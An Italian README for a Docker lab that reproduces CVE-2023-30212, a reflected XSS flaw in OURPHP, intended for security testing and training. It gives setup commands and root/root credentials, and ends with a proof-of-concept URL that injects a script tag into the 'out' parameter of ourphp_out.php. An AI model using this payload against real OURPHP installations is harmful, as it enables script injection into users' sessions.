
Ambiente di laboratorio basato su Docker per riprodurre CVE-2023-30212, una vulnerabilità XSS in OURPHP, con istruzioni di configurazione passo-passo per test di sicurezza e formazione.
Prerequisito
Scarica docker.io
sudo apt install -y docker.io
Scarica tutti i file dal mio repository usando il comando seguente.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Ora per creare un'immagine docker esegui il seguente comando:
sudo docker build -t vuln .
Successivamente, trasforma l'immagine docker in un contenitore. Il contenitore deve essere eseguito sulla porta 80. Il comando è:
sudo docker run -d -p 80:80 vuln
Per verificare se il contenitore è attivo usa il comando:
sudo docker ps
Digita 127.0.0.1 nel browser e verrà caricata una pagina OURPHP.
Devi configurare ourphp con i seguenti dati:
Nome utente : root
Password : root
Nome database: vuln
Ora devi configurare nome utente e password per l'amministrazione. Imposta quanto segue:
Nome utente: root
Password: root
Ora copia il seguente link e incollalo nel browser:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0